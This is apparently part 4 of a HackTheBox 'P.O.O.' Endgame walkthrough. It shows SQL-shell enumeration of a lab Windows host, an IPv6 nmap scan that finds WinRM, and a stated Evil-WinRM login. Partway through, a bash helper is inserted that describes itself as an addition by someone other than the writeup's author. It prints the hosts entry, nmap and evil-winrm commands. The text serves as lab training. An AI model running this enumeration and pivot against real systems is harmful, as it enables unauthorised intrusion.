HackTheBox P.O.O Writeup Series:
- PART 1: HackTheBox Endgame P.O.O Writeup Part 1 – Recon (Flag 01/05)
- PART 2: HackTheBox Endgame P.O.O Writeup Part 2 – Huh?! (Flag 02/05)
- PART 3: HackTheBox Endgame P.O.O Writeup Part 3 – BackTrack (Flag 03/05)
- PART 4: HackTheBox Endgame P.O.O Writeup Part 4 – Foothold (Flag 04/05)
- PART 5: p00ned (Coming soon)
The 4th flag of P.O.O was a bit complicated and time-consuming because I had no idea what to do. I tried Evil-WinRM, DCSync and a lot of Impacket tools to gain a foothold; all my efforts were in vain.
But, as always, a simple and straight-to-the-point nudge from a good fellow HTB user made me understand what I was supposed to try. I was going in the wrong direction. So here is the writeup of P.O.O Part 4: Foothold.
As I already had Administrator credentials from my previous flag, I tried to log in as Administrator with the SQL shell Python script. I was able to log in successfully and get a shell, but the Administrator is a public user with limited access.
I ran a couple of commands to find the users on the box, the Administrator's privileges, etc.
# root @ ns09 in ~/htb/poo [14:52:36]
$ python SQL-Explt.py
Successful login: intranet.poo\Administrator@10.13.38.11
CMD MSSQL$POO_PUBLIC@COMPATIBILITY C:\WINDOWS\system32> net user Administrator
User name Administrator
Full Name
Comment Built-in account for administering the computer/domain
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 4/4/2018 11:27:10 AM
Password expires Never
Password changeable 4/5/2018 11:27:10 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 3/6/2020 1:52:59 PM
Logon hours allowed All
Local Group Memberships *Administrators
Global Group memberships *None
The command completed successfully.
CMD MSSQL$POO_PUBLIC@COMPATIBILITY C:\WINDOWS\system32> whoami /all
USER INFORMATION
----------------
User Name SID
=========================== =============================================================
nt service\mssql$poo_public S-1-5-80-4078066653-3512796471-551061035-3947311196-544738325
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label S-1-16-12288
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Monitor Users Alias S-1-5-32-558 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT SERVICE\ALL SERVICES Well-known group S-1-5-80-0 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
CMD MSSQL$POO_PUBLIC@COMPATIBILITY C:\WINDOWS\system32> net users
User accounts for \\COMPATIBILITY
-------------------------------------------------------------------------------
Administrator DefaultAccount doobie
doobie2 Guest POO_PUBLIC00
POO_PUBLIC01 POO_PUBLIC02 POO_PUBLIC03
POO_PUBLIC04 POO_PUBLIC05 POO_PUBLIC06
POO_PUBLIC07 POO_PUBLIC08 POO_PUBLIC09
POO_PUBLIC10 POO_PUBLIC11 POO_PUBLIC12
POO_PUBLIC13 POO_PUBLIC14 POO_PUBLIC15
POO_PUBLIC16 POO_PUBLIC17 POO_PUBLIC18
POO_PUBLIC19 POO_PUBLIC20 script
WDAGUtilityAccount
The command completed successfully.
CMD MSSQL$POO_PUBLIC@COMPATIBILITY C:\WINDOWS\system32>
At this moment I was clueless again. The Administrator seemed useless for the first time. But, to my surprise, an unintended "ipconfig /all" showed me that the machine's network is configured with a preferred IPv6 address, dead:babe::1001. The DNS is pointing to 172.20.128.53. I tried to ping Google's DNS 8.8.8.8 and it failed. My ping to 172.20.128.53 was successful.
# root @ ns09 in ~/htb/poo [15:07:21]
$ python SQL-Explt.py
Successful login: intranet.poo\Administrator@10.13.38.11
CMD MSSQL$POO_PUBLIC@COMPATIBILITY C:\WINDOWS\system32> ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : COMPATIBILITY
Primary Dns Suffix . . . . . . . : intranet.poo
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : intranet.poo
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection
Physical Address. . . . . . . . . : 00-50-56-B9-76-07
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
IPv6 Address. . . . . . . . . . . : dead:babe::1001(Preferred)
Link-local IPv6 Address . . . . . : fe80::20ca:ccce:396f:dba1%11(Preferred)
IPv4 Address. . . . . . . . . . . : 10.13.38.11(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : dead:babe::1
10.13.38.2
DNS Servers . . . . . . . . . . . : dead:babe::1
10.13.38.2
NetBIOS over Tcpip. . . . . . . . : Disabled
Ethernet adapter Ethernet1:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection #2
Physical Address. . . . . . . . . : 00-50-56-B9-D9-FF
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
IPv4 Address. . . . . . . . . . . : 172.20.128.101(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
DNS Servers . . . . . . . . . . . : 172.20.128.53
NetBIOS over Tcpip. . . . . . . . : Disabled
CMD MSSQL$POO_PUBLIC@COMPATIBILITY C:\WINDOWS\system32>
Now that I knew the IPv6 address of the machine, I decided to scan it for open ports and services.
# root @ ns09 in ~ [15:29:04]
$ nmap -6 -p- -T4 -A -v dead:babe::1001
Scanning dead:babe::1001 [65535 ports]
Discovered open port 80/tcp on dead:babe::1001
Discovered open port 5985/tcp on dead:babe::1001
Discovered open port 1433/tcp on dead:babe::1001
Nmap scan report for dead:babe::1001
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-server-header:
| Microsoft-HTTPAPI/2.0
|_ Microsoft-IIS/10.0
|_http-title: Bad Request
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.2027.00; RTM+
| ms-sql-ntlm-info:
| Target_Name: POO
| NetBIOS_Domain_Name: POO
| NetBIOS_Computer_Name: COMPATIBILITY
| DNS_Domain_Name: intranet.poo
| DNS_Computer_Name: COMPATIBILITY.intranet.poo
| DNS_Tree_Name: intranet.poo
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-02-25T19:31:30
| Not valid after: 2050-02-25T19:31:30
| MD5: 10bc d953 87a6 26e9 9eff 885a 4919 425d
|_SHA-1: ac12 0344 6313 bbf4 502c 1984 56a7 deeb 3b9f 5320
|_ssl-date: 2020-03-06T12:35:23+00:00; +7s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
No OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=6%D=3/6%OT=80%CT=%CU=%PV=N%DS=1%DC=D%G=Y%TM=5E624384%P=x8
OS:6_64-pc-linux-gnu)S1(P=600e3b750020067fXX{32}0050a7b8c45a6204d58a27fe80
OS:12ffff50ab0000020405390103030801010402%ST=0.07778%RT=0.272633)S2(P=6008
OS:06730020067fXX{32}0050a7b90af90be6d58a27ff8012ffff602900000204053901030
OS:30801010402%ST=0.178774%RT=0.347316)S3(P=60067b20001c067fXX{32}0050a7ba
OS:bdad2deed58a28007012ffffa07100000204053901030308%ST=0.277737%RT=0.45156
OS:6)S4(P=600ffefb0020067fXX{32}0050a7bb0924a5fcd58a28018012ffffc7e3000002
OS:0405390103030801010402%ST=0.377846%RT=0.552361)S5(P=600d7a440020067fXX{
OS:32}0050a7bcd54f3488d58a28028012ffff6d2a0000020405390103030801010402%ST=
OS:0.478352%RT=0.644463)S6(P=6007ef2c001c067fXX{32}0050a7bd5514f4b0d58a280
OS:37012fc9444b500000204053901010402%ST=0.578091%RT=0.748078)IE1(P=6000{4}
OS:803a7fXX{32}81007f97abcd00{122}%ST=0.602311%RT=0.793024)TECN(P=602359ba
OS:0020067fXX{32}0050a7becf3d00d5d58a28048052ffffa6ab000002040539010303080
OS:1010402%ST=0.807169%RT=0.980875)EXTRA(FL=12345)
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 6s, deviation: 0s, median: 6s
| ms-sql-info:
| dead:babe::1001:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM+
| number: 14.00.2027.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: true
|_ TCP port: 1433
TRACEROUTE
HOP RTT ADDRESS
1 185.30 ms dead:babe::1001
Nmap done: 1 IP address (1 host up) scanned in 368.44 seconds
Raw packets sent: 131344 (8.408MB) | Rcvd: 230 (14.704KB)
# root @ ns09 in ~ [15:35:16]
$
Well, well, well, I found what I was looking for. WinRM is running on port 5985. In the next step I updated my hosts file with the newly found IPv6 address and used Evil-WinRM to get a PowerShell shell.
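The steps above (read the IPv6 address off "ipconfig /all", scan it with nmap -6, add a hosts entry, connect with Evil-WinRM) can be scripted so the same pivot is repeatable on the next box. The bash helper below is an added example, not code from the original writeup or from the HTB lab: it parses a constructed "ipconfig /all" sample modelled on the output above, skips link-local addresses, prints the /etc/hosts line, and prints (rather than runs) the follow-up nmap and evil-winrm commands. The function names, the sample text, the second IPv4-only sample and the <password> placeholder are all mine.

```shell
#!/usr/bin/env bash
# Added example, not from the original writeup: turn captured `ipconfig /all`
# output into the attacker-side follow-up used above (hosts entry, nmap -6,
# evil-winrm). Function names and the sample text below are constructed.

# Constructed sample, modelled on the adapter layout shown above, with the CRLF
# line endings Windows emits. The %%11 becomes the literal zone suffix %11.
SAMPLE_IPCONFIG=$(printf 'Host Name . . . . . . . . . . . . : COMPATIBILITY\r\nPrimary Dns Suffix  . . . . . . . : intranet.poo\r\nEthernet adapter Ethernet0:\r\n   IPv6 Address. . . . . . . . . . . : dead:babe::1001(Preferred)\r\n   Link-local IPv6 Address . . . . . : fe80::20ca:ccce:396f:dba1%%11(Preferred)\r\n   IPv4 Address. . . . . . . . . . . : 10.13.38.11(Preferred)\r\nEthernet adapter Ethernet1:\r\n   IPv4 Address. . . . . . . . . . . : 172.20.128.101(Preferred)\r\n')

# Constructed negative case: a host with no IPv6 address configured at all.
SAMPLE_V4ONLY=$(printf 'Host Name . . . . . . . . . . . . : LEGACY\r\nPrimary Dns Suffix  . . . . . . . : intranet.poo\r\nEthernet adapter Ethernet0:\r\n   IPv4 Address. . . . . . . . . . . : 10.13.38.12(Preferred)\r\n')

# Strip CRs so the sed calls below see plain Unix lines.
_unix() { printf '%s\n' "$1" | tr -d '\r'; }

# "Host Name . . . : COMPATIBILITY" -> COMPATIBILITY
ipconfig_hostname() {
    _unix "$1" | sed -n 's/^[[:space:]]*Host Name.*: //p' | head -n 1
}

# "Primary Dns Suffix . . . : intranet.poo" -> intranet.poo
ipconfig_dns_suffix() {
    _unix "$1" | sed -n 's/^[[:space:]]*Primary Dns Suffix.*: //p' | head -n 1
}

# Every address on an "IPv6 Address" or "Temporary IPv6 Address" line, with the
# "(Preferred)"/"(Deprecated)" state stripped, one per line, de-duplicated.
# "Link-local IPv6 Address" lines are deliberately not matched: fe80::/10 is
# reachable only on the same segment and needs a %zone suffix, so it is not
# what you scan from a remote attacker box.
ipconfig_global_ipv6() {
    _unix "$1" \
        | sed -n 's/^[[:space:]]*\(Temporary \)\{0,1\}IPv6 Address.*: \([0-9A-Fa-f:]*\).*/\2/p' \
        | sort -u
}

# Build the /etc/hosts line "<ipv6> <fqdn> <shortname>", lower-cased. A name
# lets tools that build a URL from the target (where a bare IPv6 literal would
# need brackets) reach the box unchanged. Fails when no global IPv6 is present.
hosts_entry() {
    local out="$1" host suffix addr
    host=$(ipconfig_hostname "$out" | tr '[:upper:]' '[:lower:]')
    suffix=$(ipconfig_dns_suffix "$out" | tr '[:upper:]' '[:lower:]')
    addr=$(ipconfig_global_ipv6 "$out" | head -n 1)
    if [ -z "$addr" ]; then
        echo "hosts_entry: no global IPv6 address in ipconfig output" >&2
        return 1
    fi
    printf '%s %s.%s %s\n' "$addr" "$host" "$suffix" "$host"
}

# Print (do not run) the follow-up for a hosts entry: the full IPv6 port scan
# as used above and the WinRM connection. <password> is a placeholder.
followup_commands() {
    local entry="$1" addr fqdn
    addr=${entry%% *}
    fqdn=$(printf '%s' "$entry" | cut -d ' ' -f 2)
    printf 'nmap -6 -p- -T4 -A -v %s\n' "$addr"
    printf 'evil-winrm -i %s -u Administrator -p <password>\n' "$fqdn"
}

# Usage: hosts line and commands for the sample; the IPv4-only sample is
# rejected instead of producing a bogus entry.
entry=$(hosts_entry "$SAMPLE_IPCONFIG")
printf '%s\n' "$entry"
followup_commands "$entry"
hosts_entry "$SAMPLE_V4ONLY" || echo "(skipped: IPv4-only host)"
```

Two practical points the script encodes: only non-link-local addresses are worth carrying back to the attacker box, because fe80:: addresses are reachable solely on the local segment and need a zone suffix; and if a service answers on the IPv6 address that your IPv4 scan never showed, the filtering in front of it is most likely IPv4-only, so on the defensive side any exposure review of a dual-stack host has to cover both address families.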
That's all folks, thanks for reading. See you soon with the last part, "p00ned".